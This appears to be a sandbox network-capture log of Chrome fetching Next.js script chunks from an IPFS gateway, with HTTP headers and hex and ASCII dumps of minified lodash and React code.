                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 62 6f 6c 73 28 65 29 3b 74 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 74 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 29 2c 72 2e 70 75 73 68 2e 61 70 70 6c 79 28 72 2c 6f 29 7d 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 3b 74 25 32 3f 78 28 4f 62 6a 65 63 74 28 72 29 2c 21 30 29 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 28
                                                                                                                                                                                                                                                  Data Ascii: bols(e);t&&(o=o.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),r.push.apply(r,o)}return r}function m(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{};t%2?x(Object(r),!0).forEach((function(t){(
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 6e 2e 63 75 72 72 65 6e 74 29 7c 7c 76 6f 69 64 20 30 3d 3d 3d 68 3f 76 6f 69 64 20 30 3a 68 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 29 3b 72 28 22 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 22 2e 63 6f 6e 63 61 74 28 77 69 6e 64 6f 77 2e 62 74 6f 61 28 75 6e 65 73 63 61 70 65 28 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 78 29 29 29 29 29 7d 7d 29 2c 5b 61 2c 6f 5d 29 2c 28 30 2c 64 2e 6a 73 78 73 29 28 22 64 69 76 22 2c 7b 73 74 79 6c 65 3a 7b 76 69 73 69 62 69 6c 69 74 79 3a 22 68 69 64 64 65 6e 22 2c 68 65 69 67 68 74 3a 30 2c 77 69 64 74 68 3a 30 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 64 2e 6a 73 78 29 28 22 6f 62 6a 65 63 74 22 2c 7b
                                                                                                                                                                                                                                                  Data Ascii: n.current)||void 0===h?void 0:h.contentDocument);r("data:image/svg+xml;base64,".concat(window.btoa(unescape(encodeURIComponent(x)))))}}),[a,o]),(0,d.jsxs)("div",{style:{visibility:"hidden",height:0,width:0,overflow:"hidden"},children:[(0,d.jsx)("object",{
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2e 33 31 37 2d 34 36 2e 33 37 38 41 31 32 37 2e 33 33 20 31 32 37 2e 33 33 20 30 20 30 20 31 20 31 30 32 2e 32 20 32 2e 36 61 31 32 39 2e 32 34 34 20 31 32 39 2e 32 34 34 20 30 20 30 20 31 20 35 31 2e 35 39 33 20 30 20 31 32 37 2e 33 30 38 20 31 32 37 2e 33 30 38 20 30 20 30 20 31 20 34 35 2e 37 37 20 31 39 2e 32 36 20 31 32 38 2e 33 36 37 20 31 32 38 2e 33 36 37 20 30 20 30 20 31 20 34 36 2e 33 37 35 20 35 36 2e 33 31 36 41 31 32 37 2e 33 34 33 20 31 32 37 2e 33 34 33 20 30 20 30 20 31 20 32 35 33 2e 34 20 31 30 32 2e 32 61 31 32 39 2e 32 34 38 20 31 32 39 2e 32 34 38 20 30 20 30 20 31 20 30 20 35 31 2e 35 39 33 20 31 32 37 2e 33 20 31 32 37 2e 33 20 30 20 30 20 31 2d 31 39 2e 32 36 20 34 35 2e 37 37 20 31 32 38 2e 33 38 32 20 31 32 38 2e 33 38 32 20 30
                                                                                                                                                                                                                                                  Data Ascii: .317-46.378A127.33 127.33 0 0 1 102.2 2.6a129.244 129.244 0 0 1 51.593 0 127.308 127.308 0 0 1 45.77 19.26 128.367 128.367 0 0 1 46.375 56.316A127.343 127.343 0 0 1 253.4 102.2a129.248 129.248 0 0 1 0 51.593 127.3 127.3 0 0 1-19.26 45.77 128.382 128.382 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  70192.168.2.549783209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC508OUTGET /_next/static/chunks/29107295.4a69275373f23f88.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1364INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 71691
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreifrrj7mmivchpo5oxfjg7g5bx5dqtz2uhc5e5wl7k2zo5xxpsvkdm"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/29107295.4a69275373f23f88.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreifrrj7mmivchpo5oxfjg7g5bx5dqtz2uhc5e5wl7k2zo5xxpsvkdm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 62 31 63 37 36 37 63 39 66 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42b1c767c9f-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 36 32 5d 2c 7b 39 36 34 38 36 3a 66 75 6e 63 74 69 6f 6e 28 6e 2c 74 2c 72 29 7b 76 61 72 20 65 3b 6e 3d 72 2e 6e 6d 64 28 6e 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 75 2c 69 3d 22 45 78 70 65 63 74 65 64 20 61 20 66 75 6e 63 74 69 6f 6e 22 2c 6f 3d 22 5f 5f 6c 6f 64 61 73 68 5f 68 61 73 68 5f 75 6e 64 65 66 69 6e 65 64 5f 5f 22 2c 66 3d 22 5f 5f 6c 6f 64 61 73 68 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 5f 22 2c 61 3d 31 36 2c 63 3d 33 32 2c 6c 3d 36 34 2c 73 3d 31 32 38 2c 68 3d 32 35 36 2c 70 3d 31 2f 30 2c 76 3d 39 30 30 37 31 39 39 32 35 34 37 34 30 39 39 31 2c 5f 3d
                                                                                                                                                                                                                                                  Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3662],{96486:function(n,t,r){var e;n=r.nmd(n),function(){var u,i="Expected a function",o="__lodash_hash_undefined__",f="__lodash_placeholder__",a=16,c=32,l=64,s=128,h=256,p=1/0,v=9007199254740991,_=
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 5c 5d 29 28 3f 3a 5c 2e 7c 5c 5b 5c 5d 7c 24 29 29 2f 67 2c 75 6e 3d 2f 5b 5c 5c 5e 24 2e 2a 2b 3f 28 29 5b 5c 5d 7b 7d 7c 5d 2f 67 2c 6f 6e 3d 52 65 67 45 78 70 28 75 6e 2e 73 6f 75 72 63 65 29 2c 66 6e 3d 2f 5e 5c 73 2b 2f 2c 61 6e 3d 2f 5c 73 2f 2c 63 6e 3d 2f 5c 7b 28 3f 3a 5c 6e 5c 2f 5c 2a 20 5c 5b 77 72 61 70 70 65 64 20 77 69 74 68 20 2e 2b 5c 5d 20 5c 2a 5c 2f 29 3f 5c 6e 3f 2f 2c 6c 6e 3d 2f 5c 7b 5c 6e 5c 2f 5c 2a 20 5c 5b 77 72 61 70 70 65 64 20 77 69 74 68 20 28 2e 2b 29 5c 5d 20 5c 2a 2f 2c 73 6e 3d 2f 2c 3f 20 26 20 2f 2c 68 6e 3d 2f 5b 5e 5c 78 30 30 2d 5c 78 32 66 5c 78 33 61 2d 5c 78 34 30 5c 78 35 62 2d 5c 78 36 30 5c 78 37 62 2d 5c 78 37 66 5d 2b 2f 67 2c 70 6e 3d 2f 5b 28 29 3d 2c 7b 7d 5c 5b 5c 5d 5c 2f 5c 73 5d 2f 2c 76 6e 3d 2f 5c
                                                                                                                                                                                                                                                  Data Ascii: \])(?:\.|\[\]|$))/g,un=/[\\^$.*+?()[\]{}|]/g,on=RegExp(un.source),fn=/^\s+/,an=/\s/,cn=/\{(?:\n\/\* \[wrapped with .+\] \*\/)?\n?/,ln=/\{\n\/\* \[wrapped with (.+)\] \*/,sn=/,? & /,hn=/[^\x00-\x2f\x3a-\x40\x5b-\x60\x7b-\x7f]+/g,pn=/[()=,{}\[\]\/\s]/,vn=/\
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 65 5c 5c 75 66 65 30 66 5d 3f 22 2c 4a 6e 3d 48 6e 2b 47 6e 2b 28 22 28 3f 3a 5c 5c 75 32 30 30 64 28 3f 3a 22 2b 5b 4e 6e 2c 4d 6e 2c 46 6e 5d 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2b 48 6e 2b 47 6e 2b 22 29 2a 22 29 2c 59 6e 3d 22 28 3f 3a 22 2b 5b 42 6e 2c 4d 6e 2c 46 6e 5d 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2b 4a 6e 2c 51 6e 3d 22 28 3f 3a 22 2b 5b 4e 6e 2b 4c 6e 2b 22 3f 22 2c 4c 6e 2c 4d 6e 2c 46 6e 2c 43 6e 5d 2e 6a 6f 69 6e 28 22 7c 22 29 2b 22 29 22 2c 58 6e 3d 52 65 67 45 78 70 28 53 6e 2c 22 67 22 29 2c 6e 74 3d 52 65 67 45 78 70 28 4c 6e 2c 22 67 22 29 2c 74 74 3d 52 65 67 45 78 70 28 44 6e 2b 22 28 3f 3d 22 2b 44 6e 2b 22 29 7c 22 2b 51 6e 2b 4a 6e 2c 22 67 22 29 2c 72 74 3d 52 65 67 45 78 70 28 5b 50 6e 2b 22 3f 22 2b 54 6e 2b 22
                                                                                                                                                                                                                                                  Data Ascii: e\\ufe0f]?",Jn=Hn+Gn+("(?:\\u200d(?:"+[Nn,Mn,Fn].join("|")+")"+Hn+Gn+")*"),Yn="(?:"+[Bn,Mn,Fn].join("|")+")"+Jn,Qn="(?:"+[Nn+Ln+"?",Ln,Mn,Fn,Cn].join("|")+")",Xn=RegExp(Sn,"g"),nt=RegExp(Ln,"g"),tt=RegExp(Dn+"(?="+Dn+")|"+Qn+Jn,"g"),rt=RegExp([Pn+"?"+Tn+"
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 2c 68 74 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 2e 67 26 26 72 2e 67 26 26 72 2e 67 2e 4f 62 6a 65 63 74 3d 3d 3d 4f 62 6a 65 63 74 26 26 72 2e 67 2c 70 74 3d 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 73 65 6c 66 26 26 73 65 6c 66 26 26 73 65 6c 66 2e 4f 62 6a 65 63 74 3d 3d 3d 4f 62 6a 65 63 74 26 26 73 65 6c 66 2c 76 74 3d 68 74 7c 7c 70 74 7c 7c 46 75 6e 63 74 69 6f 6e 28 22 72 65 74 75 72 6e 20 74 68 69 73 22 29 28 29 2c 5f 74 3d 74 26 26 21 74 2e 6e 6f 64 65 54 79 70 65 26 26 74 2c 67 74 3d 5f 74 26 26 6e 26 26 21 6e 2e 6e 6f 64 65 54 79 70 65 26 26 6e 2c 79 74 3d 67 74 26 26 67 74 2e 65 78 70 6f 72 74 73 3d 3d 3d 5f 74 2c 64 74 3d 79 74 26 26 68 74 2e 70 72 6f 63 65 73 73 2c 62 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72
                                                                                                                                                                                                                                                  Data Ascii: ,ht="object"==typeof r.g&&r.g&&r.g.Object===Object&&r.g,pt="object"==typeof self&&self&&self.Object===Object&&self,vt=ht||pt||Function("return this")(),_t=t&&!t.nodeType&&t,gt=_t&&n&&!n.nodeType&&n,yt=gt&&gt.exports===_t,dt=yt&&ht.process,bt=function(){tr
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 55 74 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 74 2e 6c 65 6e 67 74 68 2c 75 3d 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 72 3c 65 3b 29 6e 5b 75 2b 72 5d 3d 74 5b 72 5d 3b 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 6e 2c 74 2c 72 2c 65 29 7b 76 61 72 20 75 3d 2d 31 2c 69 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 65 26 26 69 26 26 28 72 3d 6e 5b 2b 2b 75 5d 29 3b 2b 2b 75 3c 69 3b 29 72 3d 74 28 72 2c 6e 5b 75 5d 2c 75 2c 6e 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 54 74 28 6e 2c 74 2c 72 2c 65 29 7b 76 61 72 20 75 3d 6e 75 6c 6c 3d 3d 6e 3f 30 3a 6e 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 65 26 26 75 26 26 28 72 3d 6e 5b 2d 2d 75 5d 29 3b 75 2d 2d 3b
                                                                                                                                                                                                                                                  Data Ascii: function Ut(n,t){for(var r=-1,e=t.length,u=n.length;++r<e;)n[u+r]=t[r];return n}function Bt(n,t,r,e){var u=-1,i=null==n?0:n.length;for(e&&i&&(r=n[++u]);++u<i;)r=t(r,n[u],u,n);return r}function Tt(n,t,r,e){var u=null==n?0:n.length;for(e&&u&&(r=n[--u]);u--;
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 4c 74 28 74 2c 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 6e 5b 74 5d 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 6e 72 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 6e 2e 68 61 73 28 74 29 7d 66 75 6e 63 74 69 6f 6e 20 74 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 6e 2e 6c 65 6e 67 74 68 3b 2b 2b 72 3c 65 26 26 46 74 28 74 2c 6e 5b 72 5d 2c 30 29 3e 2d 31 3b 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 72 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 6e 2e 6c 65 6e 67 74 68 3b 72 2d 2d 26 26 46 74 28 74 2c 6e 5b 72 5d 2c 30 29 3e 2d 31 3b 29 3b 72 65 74 75 72 6e 20 72 7d 66 75 6e 63 74 69 6f 6e 20 65 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 6e 2e 6c 65 6e 67 74 68 2c 65 3d 30 3b 72 2d 2d 3b 29 6e
                                                                                                                                                                                                                                                  Data Ascii: Lt(t,(function(t){return n[t]}))}function nr(n,t){return n.has(t)}function tr(n,t){for(var r=-1,e=n.length;++r<e&&Ft(t,n[r],0)>-1;);return r}function rr(n,t){for(var r=n.length;r--&&Ft(t,n[r],0)>-1;);return r}function er(n,t){for(var r=n.length,e=0;r--;)n
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 31 32 30 22 3a 22 47 22 2c 22 5c 75 30 31 32 32 22 3a 22 47 22 2c 22 5c 75 30 31 31 64 22 3a 22 67 22 2c 22 5c 75 30 31 31 66 22 3a 22 67 22 2c 22 5c 75 30 31 32 31 22 3a 22 67 22 2c 22 5c 75 30 31 32 33 22 3a 22 67 22 2c 22 5c 75 30 31 32 34 22 3a 22 48 22 2c 22 5c 75 30 31 32 36 22 3a 22 48 22 2c 22 5c 75 30 31 32 35 22 3a 22 68 22 2c 22 5c 75 30 31 32 37 22 3a 22 68 22 2c 22 5c 75 30 31 32 38 22 3a 22 49 22 2c 22 5c 75 30 31 32 61 22 3a 22 49 22 2c 22 5c 75 30 31 32 63 22 3a 22 49 22 2c 22 5c 75 30 31 32 65 22 3a 22 49 22 2c 22 5c 75 30 31 33 30 22 3a 22 49 22 2c 22 5c 75 30 31 32 39 22 3a 22 69 22 2c 22 5c 75 30 31 32 62 22 3a 22 69 22 2c 22 5c 75 30 31 32 64 22 3a 22 69 22 2c 22 5c 75 30 31 32 66 22 3a 22 69 22 2c 22 5c 75 30 31 33 31 22 3a 22 69 22
                                                                                                                                                                                                                                                  Data Ascii: 120":"G","\u0122":"G","\u011d":"g","\u011f":"g","\u0121":"g","\u0123":"g","\u0124":"H","\u0126":"H","\u0125":"h","\u0127":"h","\u0128":"I","\u012a":"I","\u012c":"I","\u012e":"I","\u0130":"I","\u0129":"i","\u012b":"i","\u012d":"i","\u012f":"i","\u0131":"i"
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 2b 63 74 5b 6e 5d 7d 66 75 6e 63 74 69 6f 6e 20 66 72 28 6e 29 7b 72 65 74 75 72 6e 20 65 74 2e 74 65 73 74 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 61 72 28 6e 29 7b 76 61 72 20 74 3d 2d 31 2c 72 3d 41 72 72 61 79 28 6e 2e 73 69 7a 65 29 3b 72 65 74 75 72 6e 20 6e 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 65 29 7b 72 5b 2b 2b 74 5d 3d 5b 65 2c 6e 5d 7d 29 29 2c 72 7d 66 75 6e 63 74 69 6f 6e 20 63 72 28 6e 2c 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 72 29 7b 72 65 74 75 72 6e 20 6e 28 74 28 72 29 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 6c 72 28 6e 2c 74 29 7b 66 6f 72 28 76 61 72 20 72 3d 2d 31 2c 65 3d 6e 2e 6c 65 6e 67 74 68 2c 75 3d 30 2c 69 3d 5b 5d 3b 2b 2b 72 3c 65 3b 29 7b 76 61 72 20 6f 3d 6e 5b 72 5d 3b 6f 21 3d
                                                                                                                                                                                                                                                  Data Ascii: "+ct[n]}function fr(n){return et.test(n)}function ar(n){var t=-1,r=Array(n.size);return n.forEach((function(n,e){r[++t]=[e,n]})),r}function cr(n,t){return function(r){return n(t(r))}}function lr(n,t){for(var r=-1,e=n.length,u=0,i=[];++r<e;){var o=n[r];o!=
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1369INData Raw: 22 29 2c 50 6e 3d 79 74 3f 74 2e 42 75 66 66 65 72 3a 75 2c 71 6e 3d 74 2e 53 79 6d 62 6f 6c 2c 5a 6e 3d 74 2e 55 69 6e 74 38 41 72 72 61 79 2c 4b 6e 3d 50 6e 3f 50 6e 2e 61 6c 6c 6f 63 55 6e 73 61 66 65 3a 75 2c 56 6e 3d 63 72 28 49 6e 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 2c 49 6e 29 2c 47 6e 3d 49 6e 2e 63 72 65 61 74 65 2c 48 6e 3d 57 6e 2e 70 72 6f 70 65 72 74 79 49 73 45 6e 75 6d 65 72 61 62 6c 65 2c 4a 6e 3d 53 6e 2e 73 70 6c 69 63 65 2c 59 6e 3d 71 6e 3f 71 6e 2e 69 73 43 6f 6e 63 61 74 53 70 72 65 61 64 61 62 6c 65 3a 75 2c 51 6e 3d 71 6e 3f 71 6e 2e 69 74 65 72 61 74 6f 72 3a 75 2c 74 74 3d 71 6e 3f 71 6e 2e 74 6f 53 74 72 69 6e 67 54 61 67 3a 75 2c 65 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 6e 3d 68 69 28 49 6e 2c
                                                                                                                                                                                                                                                  Data Ascii: "),Pn=yt?t.Buffer:u,qn=t.Symbol,Zn=t.Uint8Array,Kn=Pn?Pn.allocUnsafe:u,Vn=cr(In.getPrototypeOf,In),Gn=In.create,Hn=Wn.propertyIsEnumerable,Jn=Sn.splice,Yn=qn?qn.isConcatSpreadable:u,Qn=qn?qn.iterator:u,tt=qn?qn.toStringTag:u,et=function(){try{var n=hi(In,


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  71192.168.2.549789209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC739OUTGET /_next/static/chunks/5599-221be466b9fcb06f.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:45 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 36944
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreicpczwah6ggvvqgay3njusbksql3bir5ikm56azlk3f25yxhlmnem"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/5599-221be466b9fcb06f.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreicpczwah6ggvvqgay3njusbksql3bir5ikm56azlk3f25yxhlmnem
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028479
                                                                                                                                                                                                                                                  2024-09-28 04:11:45 UTC104INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 32 62 39 65 61 37 38 63 33 36 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e42b9ea78c36-EWRalt-svc: h3=":443"; ma=86400
